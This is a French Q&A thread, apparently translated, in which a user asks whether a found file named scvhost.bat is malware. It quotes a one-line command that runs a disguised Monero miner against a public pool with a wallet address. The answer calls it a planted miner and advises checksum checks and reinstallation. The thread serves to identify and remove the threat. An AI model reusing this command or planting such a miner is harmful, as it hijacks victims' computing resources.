web-dev-qa-db-fra.com

Est-ce que scvhost.bat avec cryptonight est un virus ou un mineur?

Je viens de trouver ce fichier .bat nommé scvhost.bat. Le fichier contenait ce contenu:

scvhost -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com:8005 -u 48uh2mrdkdq2tQysfkX2hZDi2hkRua4GX13EqY8djJ5xNXhez7baztVWbwXa34vUMveKAzAiA4j8xgUi29TpKXpm42jqV6H.microSf -p MXXXXXX-t 02

Est-ce un virus (pour voler des informations, etc.) ou un mineur planté? Je suis inquiet car je me mêle également de crypto-devises et stratum est une devise mentionnée dans le fichier ci-dessus.

17
NewbieProgrammer

Cela semble être une sorte de mineur, d'autant plus que le paramètre contient l'URL d'un pool d'exploration. Cependant, vous devez savoir ce qu'il y a dans le binaire. Il serait judicieux de comparer les sommes de contrôle du fichier binaire de votre système trouvé avec celles de l’équipe de développement du mineur. S'ils diffèrent; considérez votre système comme non sécurisé.

Un autre problème est que vous avez découvert l'existence de ce mineur (probablement parce qu'il utilisait beaucoup de processeur), mais vous n'avez aucune idée de ce qu'il s'est passé d'autre sur votre système. Si un intrus pouvait lancer le mineur, il aurait également pu lancer autre chose. Il peut être judicieux de récupérer une sauvegarde ou de procéder à une nouvelle installation.

34
mtak